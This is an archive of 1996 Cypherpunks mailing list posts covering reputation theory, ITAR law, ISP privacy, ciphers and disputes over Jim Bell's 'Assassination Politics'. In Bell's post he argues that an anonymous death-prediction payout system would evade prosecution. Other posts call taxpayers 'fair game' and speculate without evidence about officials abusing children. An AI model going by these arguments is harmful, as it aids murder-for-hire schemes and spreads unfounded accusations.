longer, of course. This is not for people serious about > anything. I no longer read 99% of what is posted here -- its drek. > I do not believe it would be good, however, for the list to be shut > down, because there have to be sewers to carry the world's > intellectual waste products, and if this list did not exist the likes > of Jim Bell and the others would be out causing harm on other mailing > lists. > PS Still looking for a solid site that can host a 1500 member > significant volume mailing list without choking. From Adamsc at io-online.com Wed Sep 25 03:44:09 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 25 Sep 1996 18:44:09 +0800 Subject: Snooping ISP admin?? Message-ID: <19960925052720218.AAA216@IO-ONLINE.COM> On Mon, 23 Sep 1996 08:30:34 -0700 (PDT), Eric Murray wrote: >> encountered "POP3 account in use by another user" several times in the >> past few days and I am the only user... wondering if that "in use" >> messsage is the result of a clumsy sysadmin being caught with his hand >> in the cookie jar. >> Any thoughts from the group??? > >If the sysadmin is reading your PGP mail, let him. It's very very >unlikely that he has the resources available to crack a PGP >message in this century. And if he does, his machine should be fast enough to read the entire mailbox before Michael could notice... From gregburk at netcom.com Wed Sep 25 03:47:35 1996 From: gregburk at netcom.com (Greg Burk) Date: Wed, 25 Sep 1996 18:47:35 +0800 Subject: Not reputation again! (Was: The Nature of the Cypherpunks List) Message-ID: <54f2rzdf7l@netcom.com> -----BEGIN PGP SIGNED MESSAGE----- I know, I said I was through arguing "reputation theory" and I really thought I was, but this latest impelled me to say more. tcmay at got.net (Timothy C. May) writes: > --Tim May, whose reputation is, like the list, whatever it is, for whatever > reasons, and who thus needs no defenders Indeed, your reputation needs no defenders among those of us who know you directly (if electronically) But here's something for you to think over: If there are such things as negative reputations, why hasn't your reputation zoomed to godlike status upon the ... let us say unreserved... condemnations of the Poster With Nothing Better To Do, if s/he has a negative reputation (I presume you would say so) You could contend that his/her reputation is positive, but if that's positive, what isn't? This would appear to concede my point. You could contend that the Poster With Nothing Better To Do's reputation is balanced precariously at exactly 0. I would find that a big stretch, and as above, if that's 0, what's negative? Or you could contend that there's no such thing as collective reputation, but I think there are two major flaws: His/her 1-to-1 "reputations" clearly add up to a collective consensus among us annoyed cpunk readers. Even if you contend that reputations in general do not behave collectively, it is no defense in this case at least. And I think if "reputation theory" predicts no collective behavior, it must be pretty weak. > But there comes a point where I need to speak up. (By the way, somebody > even sent me a bizarre message, saying: "I am not quite sure why you have > not shot back at Dr Virmin and his cause. Maybe that is the best way? Or > are you guilty as charged?" So, to some, my silence means I might be > guilty. Jeesh.) Because s/he can *never spend reputation down to zero*. BTW, your example is reflected in politics too. A charge that goes unanswered is assumed true by many. Just ask Michael Dukakis. Frankly, I think you should just admit that your reputation theory is flawed and rethink it. I would be interested in hearing it, but what you have now is IMHO badly flawed. -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQBVAwUBMkjPErMyVAabpHidAQFmVAH/XJ8GqayxiJOKv/5obx7MPcFX9VUJSldJ M/Vh4OBN3PYytw8TKvzxwcvJAqCjSA7AfZZZAgzfb9UMCetR4wZv8g== =5HgH -----END PGP SIGNATURE----- From dthorn at gte.net Wed Sep 25 04:09:40 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 25 Sep 1996 19:09:40 +0800 Subject: More proposals for European censorship In-Reply-To: Message-ID: <32487022.21FA@gte.net> Asgaard wrote: > On Mon, 23 Sep 1996, Peter Trei wrote: > > > It's probably no coincidence that the recently busted, utter > > > horrible child-molesting ring, with obvious protection from > > > various persons in the establishment, was centered in Belgium - > > > that's where the EU bureaucrat nomenklatura play their power games > > > and go to bordellos. > > What exactly are you suggesting when you say 'it's probably no > > coincidence?" I can't quite figure it out. > Obviously not only the arrested killer used the schoolgirls chained > in underground cells. They were for hire. High officials used his > 'services', then ordered the police to cover it up. Why else would > some ten policemen be arrested? The EU bureaucrats are served by > hordes of prostitutes. Surely there are pedophiles among the hordes. > Probably some EU pedophiles have a connection to the gang. I don't > know this of course, but speculation is cheap. If you want some actual names (remember, for entertainment purposes only!), check out a new book from Flatland called Trance Formation of America, about sex slaves et al. Truly hideous stuff! From bdavis at thepoint.net Wed Sep 25 04:11:40 1996 From: bdavis at thepoint.net (Brian Davis) Date: Wed, 25 Sep 1996 19:11:40 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: On Tue, 24 Sep 1996 s1113645 at tesla.cc.uottawa.ca wrote: > > > On Sun, 22 Sep 1996, Jim McCoy wrote: > > > Brian Davis > > [...] > > >Constitutional literalists take note: the First Amendment says nothing > > >about what the executive branch or the states can do .... > Doesn't the doctrine of limited powers mean that they cannot do what is not > specified? (If I'm not mistaken, IANAL, etc...) > If so, why would we need the First Amendment to protect us from Congress regulating speech? [etc.] And, in any event, the limited powers argument wouldn't apply to the states: "The powers not delegated to the United States by the Constitution, nor prohibited by it to the States, are reserved to the States respectively, or to the people." EBD > > The states are prohibited through the 14th Amendment via the > > Slaughterhouse cases, the ability of the executive branch to > > violate due process is questionable (from a legal viewpoint, not > > a practical one...the President cannot order you placed in jail > > unless you have broken a law which requires congress to have > > made the law in the first place...) > > And the ITARs are only executive orders, no? Not laws, right? I'm curious > as to why they're considered valid. Anyone know? > From tcmay at got.net Wed Sep 25 04:15:01 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 25 Sep 1996 19:15:01 +0800 Subject: Public Schools Message-ID: At 6:40 AM 9/25/96, Jay Gairson wrote: >First off, what does this have to do with cryptography? or anything >cypher for that matter? Nothing, but Dmitri has "different" standards of what is list-relevant than many of us do. >So, basically your saying, since my parents cannot afford to pay for a >private school for me, we are genetically inferior to those who can? >Because hate tell ya, but I've ran into some major idiots that go to >private schools. Also to consider that from the school I go to, last >year we had two perfect sat scores (no problems missed). A minor point: An 800 SAT or Achievement score does _not_ mean "no problems missed." There is some threshold for the percentage of right answers, which varies from year to year and from test to test, above which the score is marked "800." Don't ask me why they do this. (*) This should give you more hope and more determination to get a few 800s when you take the exams. (* Back in 1969 when I was taking these exams and was more neurotically interested in such things, I surmised that the 800 top end was set up to correspond to the IQ = 160 top end reported on some major IQ tests of the time. While some IQ tests are open-ended, resulting in, for example, the dubious claim that Marilyn vos Savant has an IQ of 210 or somesuch, it's more common for tests to have an upper limit, beyond which the results are considered essentially meaningless. So, if one notes that 800 + 800 = 1600, which is exactly 10 times 160, and that the "percentiles" for SAT combined scores of 1500, 1400, 1300, etc. match up with the percentiles for IQs of 150, 140, 130, etc., it's pretty clear what was done with the SAT scoring model. Obviously, many imperfections, some implicit in the nature of tests, some in the whole nature of "IQ" per se. This is why Mensa, which takes (alleged) IQs of 130, also accepts SAT combined scores in that general range (x10, of course). Of course, as Roger Gregory puts it, "Mensa is the scum of the cream of the crop.") --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jimbell at pacifier.com Wed Sep 25 04:53:26 1996 From: jimbell at pacifier.com (jim bell) Date: Wed, 25 Sep 1996 19:53:26 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <199609250755.AAA14065@mail.pacifier.com> At 11:50 PM 9/24/96 -0400, Brian Davis wrote: >On Tue, 24 Sep 1996, Rich Burroughs wrote: > >> >> Anyone who mistakes the lack of "repudiations" for AP on the list for some >> kind of tacit approval is not getting the whole picture, IMHO. >> >> Is this how journalists do their research nowadays -- "give me some info or >> I'll write something really bad about you that you'll regret?" Cool. I >> guess I thought there might still be some kind of pursuit of the truth >> involved. >> >> I personally don't have the time or energy to contribute to the AP threads. >> That != approval for the idea. >> >> I hope you include your above quote in your piece. >> > >Amen to that. Add that at least one lawyer (and former prosecutor) on >the list is confident that successful prosecutions will ensue is AP ever >gets off the ground. I don't doubt that there will be harassment. (you can't deny that charges would be brought even if it is tacitly agreed that no crime has been committed; "the harassment-value" of such a prosecution would be desired even if there is ultimately an acquittal.) AP will resemble, more than anything, gambling. While gambling is illegal in some areas, it is quite legal in others and there is no reason to believe that locales can't be found in which an AP system could operate legally. Make American laws apply everywhere? That'll be hard to justify, unless you want to unleash a world where an all people can be subject simultaneously to the laws of EVERY country, should they choose to enforce them! Would you like to be arrested in Red China for something you said years earlier in America about their leadership? And are you ignoring the fact that the intentional isolation of one participant from the knowledge of the actions and even the identity of the others makes opportunities for prosecution on "conspiracy" charges mighty slim. And since AP can operate across traditional jurisdictional boundaries, you're going to have to explain how you can prosecute Person A in Country B for giving a donation to an organization in Country C, to be paid to a person D in country E for correctly predicting the death of person F in country G, particularly when none of the identities of these people or countries can be easily known given a well-crafted cryptographic and message-routing system. Further, as you probably know as well as any, in order (at least, supposedly!) to get a conviction you need to prove "mens rea," or "guilty mind," and I suggest that none of the more passive participants in the AP system have that. (The ones who DON'T pick up a gun, knife, bomb, poison, etc.) Sure, they are aware that somewhere, sometime, somebody _may_ commit a crime in order to collect a lottery, but they don't know who, what, when, where, or how this will occur, if at all. (either before or after the fact!) In fact, since it is possible for a target to collect the reward himself (to be directed toward his designee, obviously) by committing suicide and "predicting" it, it isn't certain to the other participants that there has even been any sort of crime committed! Based on the mens rea requirement, I propose that there is plenty of room for most of the participants to reasonably claim that they are guilty of no crime. They have carefully shielded themselves and others from any guilty knowledge, and presumably they are entitled to protect themselves in this way. Morally, you could argue that these people are countenancing something nasty, in the same sense that somebody could equally well argue that if you buy a cheap shirt in Walmart you're partly responsible for sweatshop labor in El Salvador. True, I suppose, but moral guilt does not always translate into legal guilt. > And yes, I've read Jim Bell's manifesto. The fact >that no lawyer has dissected it from a legal standpoint has been used by >Mr. Bell as support for the propostion that it is legal. I suggest that there is a greater likelihood that the "powers that be" will just abandon all pretense of legality, and attempt to strike at the participants if they can find them without benefit of any sort of trial. This is a more plausible conclusion, because it cuts through all of the legal difficulties which would hinder prosecution. In effect, a low-level undeclared war. Jim Bell jimbell at pacifier.com From dthorn at gte.net Wed Sep 25 04:59:53 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 25 Sep 1996 19:59:53 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: Message-ID: <32488A8F.6FF2@gte.net> Sandy Sandfort wrote: > C'punks, > On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > > There is no such thing as an "ordinary citizen". When the U.S. > > commits war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, > > Iraq, and elsewhere, > > every American taxpayer is an accomplice and a fair game. > Illogical collectivist claptrap. When a taxpayer is targeted by > terrorists, he has been victimized twice--first by the government > that stole his money, second by the terrorist that punished him > for the (alleged) acts others commited with that money. If a > mugger buys a gun with the money he took from me, am I then > responsible for the murder he commits with it? Clearly not. > This line of "reasoning" is nothing more than a sad variant of > the old, "blame the victim" game. For shame. > Let's bring this back to crypto for a moment. Dimitri's "logic" > must necessarily lead one to the conclusion that Cypherpunks (at > least those in the US) are responsible for whatever draconian > restrictions "our" government puts on free speech, crypto or > whatever. John Gilmore, Philip Zimmermann, Whit Diffie and > others will be chagrined to learn this, I'm sure. > Dimitri needs to learn what it means to be an adult. Everyone is > totally responsible for what they do, but ONLY for what THEY do. > No one is responsible for the unassisted, willful acts of others. You are committing a logical fallacy with the above. You're saying that the mugger who commits the crime with a stolen gun is equivalent to my own hired hitmen (the local and federal police I pay so dearly for). This is obviously not the case. I didn't hire the mugger, nor did I encourage the thief in an overt way. But I did consciously select and pay for the police and govt. assassins. And so did you. Unless you're saying that the govt. forcibly takes you down to the voting booth, etc. From octobersdad at reporters.net Wed Sep 25 05:50:52 1996 From: octobersdad at reporters.net (T Bruce Tober) Date: Wed, 25 Sep 1996 20:50:52 +0800 Subject: LACC: Encryption and Japan In-Reply-To: <199609240206.WAA20711@raptor.research.att.com> Message-ID: A few months ago I read an article concerning one of the encryption gurus (other than PZ) setting up a company in Japan to create a new encryption program as good as or better than PGP which since it was developed in Japan, wouldn't be subject to ITAR. Actually I think the article indicated he'd already set up the company and developed the software and was getting ready to market it. I think it was Diffie, but can't remember and can't find any info on it. Does anyone here have any info, leads or contact details they can provide me? tbt -- | Bruce Tober - octobersdad at reporters.net - Birmingham, England | | pgp key ID 0x9E014CE9. For CV/Resume:http://pollux.com/authors/tober.htm | | For CV/Resume and Clips: http://nwsmait.intermarket.com/nmfwc/tbt.htm | | | | "Just as the strength of the Internet is chaos, so the strength of our | | liberty depends upon the chaos and cacophony of the unfettered speech the| | First Amendment protects." -- three wise federal judges | From adam at homeport.org Wed Sep 25 06:14:35 1996 From: adam at homeport.org (Adam Shostack) Date: Wed, 25 Sep 1996 21:14:35 +0800 Subject: Taking crypto out of the U.S. In-Reply-To: <19960925054434656.AAA117@IO-ONLINE.COM> Message-ID: <199609251126.GAA10877@homeport.org> Adamsc wrote: | >Theres a personal use exemption. Michael Froomkin's web page has a | >pointer to it. | | What if your laptop gets "stolen"? Or you sell it for a plane ticket home | after your wallet gets pinched? You're required to report it to the Feds. RTFU. -- "It is seldom that liberty of any kind is lost all at once." -Hume From tcmay at got.net Wed Sep 25 06:27:49 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 25 Sep 1996 21:27:49 +0800 Subject: Not reputation again! (Was: The Nature of the Cypherpunks List) Message-ID: At 6:45 AM 9/25/96, Greg Burk wrote: >I know, I said I was through arguing "reputation theory" and I really >thought I was, but this latest impelled me to say more. > >tcmay at got.net (Timothy C. May) writes: >> --Tim May, whose reputation is, like the list, whatever it is, for whatever >> reasons, and who thus needs no defenders > >Indeed, your reputation needs no defenders among those of us who know >you directly (if electronically) > >But here's something for you to think over: If there are such things as >negative reputations, why hasn't your reputation zoomed to godlike >status upon the ... let us say unreserved... condemnations of the >Poster With Nothing Better To Do, if s/he has a negative reputation (I >presume you would say so) First off, I certainly don't know what the precise "calculus of reputations" looks like. That is, how it adds, subtracts, how the reps of others factor in, etc. I think studying how it might work--and how it compares to other fields, such as movie reviews, music reviews, book reviews, etc.--might be an excellent Masters-level thesis for someone in sociology or even CS (if done with the proper slant). However, I would never think the calculus is something so simplistic as: "I rate Alice's reputation as very negative. Alice just said some bad things about Bob. Therefore, Bob's reputation will go up a great deal." More likely, something like: "Alice just said a bunch of things bad about Bob. Cool. Maybe this Bob person deserves a look." In other words, smaller steps, with diminishing returns. And with few sudden movements, except by direct judgment. >Or you could contend that there's no such thing as collective >reputation, but I think there are two major flaws: His/her 1-to-1 >"reputations" clearly add up to a collective consensus among us annoyed >cpunk readers. Even if you contend that reputations in general do not >behave collectively, it is no defense in this case at least. And I think >if "reputation theory" predicts no collective behavior, it must be >pretty weak. I believe that, to first order, reputation is a tensor. Given N people, imagine this matrix: Alice Bob Charles Daphne Earl Fiona Gloria Harold Alice .99 -.21 .75 .94 .94 .83 -.03 .22 Bob .72 .96 -.02 .85 .71 -.60 .10 .32 Charles .82 .02 .97 .90 -.50 .42 -.10 .70 Daphne .45 .87 .23 .92 .74 .87 .11 .23 Earl .89 .54 .34 .90 .95 .23 .23 .46 Fiona .87 .50 .32 .68 -.34 .97 .78 -.15 Gloria .59 .78 -.23 .15 .29 -.30 -.80 .51 Harold .65 .03 .34 .78 .51 -.76 -.51 .97 This can be read thusly: Alice has a .99 rating of her own self, a negative .21 rating of Bob (or Bob's opinions, or his posts, or whatever is being rated), and so on. Bob has a .72 rating of Alice, a .96 rating of himself, etc. "Alice(Bob) = -.21" Now in this example I made up, some various observations can be made. Nearly everyone rates Harold pretty low, except for Harold. Thus, Harold's own opinions of others, if expressed, probably won't change too many other opinions. Nearly everyone rates Daphne very highly, and her opinions are read carefully. However, Gloria does not rate Daphne highly...but then Gloria rates her own stuff a negative .80, so Gloria has some psychological issues to deal with and others typically rate her pretty low. And so on. In the real world, I think we can see how such a matrix could be constructed, based on either direct inputs (votes) from people, or based on their apparently positive or negative comments, etc. (For example, it is fairly obvious that I might give Hal Finney a rating of .90, and Vulis a -.90. And so on, for others.) Now is there a "collective reputation"? There are various additive properties, with easily understandable meanings. (If Harold is in a lot of kill files, this says a lot, for example.) Anyway, as I said before, the "calculus of reputations" is not worked out, so far as I know. Some weeks back I suggested that the mathematics of belief as developed in "Dempster-Shafer belief theory" has some nice properties that make it seem a promising area to look into. .... >Because s/he can *never spend reputation down to zero*. So you say. I see no reason reputations cannot be negative, in the sense that not only do I take the opinions of such a person very seriously, I tend in fact to believe the opposite opinion is more likely. This is a "negative " reputation. Thus, a reputation can be "spent down" to zero, and below. >Frankly, I think you should just admit that your reputation theory is >flawed and rethink it. I would be interested in hearing it, but what you >have now is IMHO badly flawed. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From stewarts at ix.netcom.com Wed Sep 25 07:10:48 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 25 Sep 1996 22:10:48 +0800 Subject: SAY WHAT? [Assassination NOISE] Message-ID: <199609250730.AAA25890@dfw-ix12.ix.netcom.com> An earlier generation of Assassination Politics set the public's stereotype view of "anarchists" for the next hundred years. Do we really want to do it again? Perhaps the public will realize that we're not lefty-anarchists, we're the Totally Unified Cypherpunk Anarcho-Capitalist Movement... Someone, probably Simon Spero said: >= .Assasination politics is impossible to defend from a classical >= .Liberal/Libertarian position. Bell advocates arbitrary applications >= .of violence and coercion without restriction. There is no way to >= .justify the initiation of force without abandoning any pretence of >= .being a Libertarian (which, to be fair, Bell doesn't claim to be). Bell, like X, is proposing mechanism without built-in policy, as well as suggesting some potential policy implementations. If you use the mechanism to sponsor assassination of people who have initiated force against you, you're only using retaliatory force, not initiating it. On the other hand, the mechanism also can be used against people who haven't initiated force against the sponsor - even against politicians who have refused to get the country into misguided but popular wars or judges who have refused to convict innocent but wrong-colored defendants. Like democracy, it's a really terrible system, and like democracy, there are some alternatives that aren't worse :-) Maybe even democracy. It's at least as appalling an idea as government. If it does catch on, and I suspect that the technology will certainly make it possible, I hope that most of the public will have enough sense and decency not to pay for murdering people who don't deserve it, so assassins will find more of a market for killing people who do, and that the lower-paid assassins who kill undeserving people will be less competent and get caught like most stupid bank robbers do. But there are enough Drug-War-Loving Americans that I doubt it. And there's enough intersection between the morality-challenged and the financially-challenged fellow Americans down on their luck that some of them will take a break from robbing liquor stores for drug money to make bigger bucks serving the desires of the public that the high-tech lynch mobs will have people they can hire. Not everybody needs Mario Greymist to get some basic "work" done. Glory of the market, matching up supply and demand. And attila replied > all very true. but I will defend Jim Bell's rights to propose > them, even if Bell is more than a few cards short of a full deck. Sure, he's got the right to, and if I run a remailer again he's welcome to use it to discuss AP (though not to propose assassinations....) Doesn't mean I want to encourage this sort of thing, though. Remailers can damn well afford to be choosy, and I'll bet 5 zorkmids that the first person to use my remailer for assassination doesn't last a month. (Oh, wait...) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From junger at pdj2-ra.F-REMOTE.CWRU.Edu Wed Sep 25 08:01:12 1996 From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger) Date: Wed, 25 Sep 1996 23:01:12 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: <3.0b19.32.19960924160043.006edf48@ricochet.net> Message-ID: <199609251126.HAA23625@pdj2-ra.F-REMOTE.CWRU.Edu> Greg Broiles writes in a most informative posting: : And that's what the ITAR is - a body of administrative law developed by the : executive branch pursuant to a grant of power from Congress. (e.g., 22 USC : 2778(a)(1), ". . . The President is authorized to designate those items : which shall be considered as defense articles and defense services for the : purposes of this section and to promulgate regulations for the import and : export of such articles and services. The items so designated shall : constitute the United States Munitions List.") It is subject to review by : the courts just like the product of Congress itself; and an agency can't do : something Congress can't do, like write an unconstitutional law. It should be added though that most administrative regulations are subject to judicial review by courts to make sure that they comply with the law passed by Congress. The ITAR, on the other hand, are not subject to this sort of review and can only be challenged in the courts on Constitutional grounds. -- Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu URL: http://samsara.law.cwru.edu From bryce at digicash.com Wed Sep 25 08:44:35 1996 From: bryce at digicash.com (bryce at digicash.com) Date: Wed, 25 Sep 1996 23:44:35 +0800 Subject: reputation, e.g. www.ffly.com (was: Not reputation again! (Was: The Nature of the Cypherpunks List) ) In-Reply-To: Message-ID: <199609251219.OAA28483@digicash.com> -----BEGIN PGP SIGNED MESSAGE----- It's silly to conflate ratings of people with ratings of people's opinions with ratings of people's ratings of etc. Some of the people I work with have awful opinions on politics, other people, music, movies, books, and food, but great opinions on computer hardware, algorithms and programming languages. But their ratings as people are generally very high. (Insert inaccurate but amusing joke to the effect that if someone has good taste in restaurants they are likely to have poor taste in video cards, or some such.) Check out Firefly (www.ffly.com). (Cpunk comment: they only track your ratings by nym, no True Name required.) Firefly has the "if I agreed with Bob a lot in the past on this subject, I'll probably agree with him again" heuristic. It appears to be a pretty ugly heuristic when applied to me. Ffly keeps trying to suggest music which is in the same _genre_ as music I have previously recommended, but what I am interested is music that is similarly _good_. My tastes don't correspond well to genres. But this is a mere anecdotal impression. Give it a spin. I wrote in the suggestion box that they add meta-ratings (especially ratings on the little "movie reviews" submitted by other FFly users). Some guy wrote back (same day!) that they were planning on it. Regards, Bryce -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2 iQB1AwUBMkkjQkjbHy8sKZitAQF5wAL/WgD5iPOR7RtCc5SNgLMGqKUJqHLiS7bM XItX4p8Z1Uri5DZgAUoOCDZ7iEoP3rleDBThGq3rFG8y6I9tbFueC00TRwoft5rb fR7pqeaDj2AzcSt4rYCi67ucsW4wQi1C =rL1w -----END PGP SIGNATURE----- From bdavis at thepoint.net Wed Sep 25 08:48:04 1996 From: bdavis at thepoint.net (Brian Davis) Date: Wed, 25 Sep 1996 23:48:04 +0800 Subject: ISPs' information on users In-Reply-To: Message-ID: On Tue, 24 Sep 1996, Timothy C. May wrote: > At 8:18 PM 9/24/96, Robert Hettinga wrote: > >--- begin forwarded text > > >> ** So Much Fuss About A Bottle Of Ketchup > >> > >> Hungarian police recently sent a fax around to the local Internet > >> service providers (ISPs) asking them to provide lists of their users > >> in Esztergom, a small town outside of Budapest. It seems somebody > >> had planted a bomb in a bottle of ketchup. Since everyone knows you > >> can download bomb-making instructions from the Internet, the police > >> figured they should investigate the local users. No, I'm not making > >> this up. > > So, Hungary has GAK -- Government Access to Ketchup. > > Good to know the 57 Varieties are now considered munitions. > > On a more serious note, perhaps legal experts here could comment on > something I've been wondering about. Could ISPs in the UlS. be compelled to > report on the browsing and net surfing habits of their customer base? > > To make this clear, I don't mean in a specific criminal case, where the > records are searchable under a warrant. I mean a blanket order that all > ISPs compile and forward records. > > Were I an ISP, I would probably say, "Hell no! They're my records and the > Fourth Amendment says my records are to be secure unless a proper court > order is issued. Besides, my fee for generating each kilobyte of records is > $100,000, nonnegotiable." > > (I think I've answered my own question, namely, ISPs would be under no > obligation to report on customer activities, absent a proper warrant, and > consistent with the ECPA.) > > However, ISPs are _not_ accorded the same status as priests, lawyers, and > others with such privacy privileges (and obligations). Would it be legal > for an ISP to offer for sale such records? Or to voluntarily go to the > cops? Worse for the ISP (and better for its customers), such interception would violate ECPA, as the 18 U.S.C. Section 2511(2)(a)(i) exception for interceptions by electronic communications services would not apply to protect the ISP. One could hardly (successfully) argue that selling out its customers was a "necessary incident" to the rendition of the ISP's services. Indeed, the exception also states "that a provider ... shall not utilize service observing or random monitoring except for mechanical or service quality control checks. I know. They could use the exception to give away a little bit, but not the whole enchilada. EBD > > (There's a certain new ISP with tight links to a quasi-religious group much > in the news lately, and some have speculated that this ISP may be > monitoring certain users....) > > --Tim May > > > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > > From declan at eff.org Wed Sep 25 08:54:10 1996 From: declan at eff.org (Declan McCullagh) Date: Wed, 25 Sep 1996 23:54:10 +0800 Subject: Lexis and Privacy - Bill approaches. In-Reply-To: Message-ID: This would be good if the bills were written well and thoughtfully. Unfortunately, they explicitly extend executive branch regulatory jurisdiction to the Net. At least the one I read did; I understand there are multiple versions. -Declan On Tue, 24 Sep 1996, Black Unicorn wrote: > > Pressure from the FTC Which fielded hundreds of complaints about Lexis and > the social security number scrap) has prompted members of the Banking > Committee to add provisions to the most recent spending bills which > protect personal information (including social security numbers, phone > numbers, addresses, and so forth) under the Fair Credit Reporting Act. > This limits access to this information to credit agencies and otherwise > authorized entities. (Of which I assume Lexis is not one). > > It's not great protection, but it's something. > > I urge everyone to take their own measures to protect personal data > regardless of what some piece of paper on a library shelf says is > protected. The only real protection is not to allow release of the data > in the first place. > > -- > I hate lightning - finger for public key - Vote Monarchist > unicorn at schloss.li > // declan at eff.org // I do not represent the EFF // declan at well.com // From osborne at gateway.grumman.com Wed Sep 25 09:16:41 1996 From: osborne at gateway.grumman.com (Rick Osborne) Date: Thu, 26 Sep 1996 00:16:41 +0800 Subject: An idle thought on CBC and block lengths Message-ID: <3.0b19.32.19960925085644.0068cb90@gateway.grumman.com> So I was sitting bored at home and thinking to myself: CBC is cool. Without the key, you're screwed because a single bit error propagates throughout the entire message. But then I was thinking, yeah, but you can still eventually get the ONE key. So I began to wonder what the difference in security is between encrypting an entire M with just one K in CBC, or encrypting M with permutations of K over specific block lengths. On the one hand you've got just one key, which makes it that much harder to find in the keyspace. On the other hand, If evil interloper Eve gets her hands it, she has to find all of the keys to get all of M. (Assuming she is using brute force and can't necessarily find the master K to permute into the subkeys.) The downsides are of course that on the one side you've got just one key, and once you get it, you get M. But on the other hand, you can get any one part of the message with less difficulty because of the higher number of keys. And, of course, if your master K is easy to brute force, then it's actually worse than the first option. Does anyone have opinions / knowledge of which is better? ____________________________________________________________ Rick Osborne osborne at gateway.grumman.com "The universe doesn't give you any points for doing things that are easy." From dlv at bwalk.dm.com Wed Sep 25 09:21:32 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 00:21:32 +0800 Subject: WARNING: This Message Actually Contains a Question In-Reply-To: <199609250610.XAA23137@dfw-ix12.ix.netcom.com> Message-ID: Bill Stewart writes: > Bruce Schneier's book Applied Cryptography discusses > Blowfish (no surprise, since it's his algorithm) and > I think also discusses GOST. Blowfish is very fast > once you've finished the (deliberately slow) key schedule. > It appears to be tolerably strong, though there hasn't > been as much analysis on it as on RC4 or IDEA yet, much less DES. A widely available C implementation of Blowfish had a bug, weakening its security under some circumstances. Make sure to use the corrected version. (The bug was in the C program, not the algorithm itself.) --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From pjb at ny.ubs.com Wed Sep 25 09:35:41 1996 From: pjb at ny.ubs.com (pjb at ny.ubs.com) Date: Thu, 26 Sep 1996 00:35:41 +0800 Subject: We removed radikal 154 from xs4all :( Message-ID: <199609251240.IAA14357@sherry.ny.ubs.com> Adam, you know the german government did not win this one, and i know that they did not win, my point was, will they, and other governments take this as a win and be encourgaged to press their luck with someone else. -paul > From aba at dcs.ex.ac.uk Wed Sep 25 02:45:54 1996 > Date: Tue, 24 Sep 1996 17:21:16 +0100 > From: Adam Back > To: pjb at ny.ubs.com > Cc: cypherpunks at toad.com > Subject: Re: We removed radikal 154 from xs4all :( > Content-Length: 989 > > > Paul writes: > > i was under the impression that germany's goal was to stop the distribution > > of radikal 154 by xs4all, not by 50 mirror sites. they seem to have > > accomplished their goal. do you really think that they will let a little > > thing like reason stand in their way when claiming victory? > > They lost: it is still available. If they went after another mirror > the number of mirrors would double :-) > > Someone in the German press needs to rub their noses in the fact that > they lost, say by printing a list of URLS, or just mentioning the > number of mirrors, and the different countries they are located in. > > The need to translate the quote: > > `The internet sees censorship as damage, and routes around it' > > and put that in big letters. > > Any German net freelance journalists reading? > > Adam > -- > #!/bin/perl -sp0777i $/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1 > lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/) > From PhneCards at aol.com Wed Sep 25 09:54:22 1996 From: PhneCards at aol.com (PhneCards at aol.com) Date: Thu, 26 Sep 1996 00:54:22 +0800 Subject: Stop Spammers Today! Message-ID: <960925085324_292805914@emout19.mail.aol.com> Dear cypherpunks; In the last few days I have received numerous email coming from you but with fake return addresses from messages posted on newsgroups. I must have been targeted because I am a bulk emailer. Letting you know now that I am a legitimate bulk emailer compiling my list with the permission of each account holder. If this barrage of email does not cease immediately, I will be forced to take legal and maybe not so legal actions to defend myself. If you would like to discuss this further, please call me at 407-438-8892. Tim =================================================== >Sender: owner-cypherpunks at toad.com >To: cypherpunks at toad.com > >Timothy C. May wrote: >> >> At 2:10 AM 9/24/96, hallam at vesuvius.ai.mit.edu wrote: >> >> >like Markof are somewhat more responsible. This is not going to stop me >> >from producing an op-ed piece linkiing the net libertarians to >assasination >> >politics unless I hear a few more repudiations of Bell's ideas. If you >> >don't very clearly reject his murderous 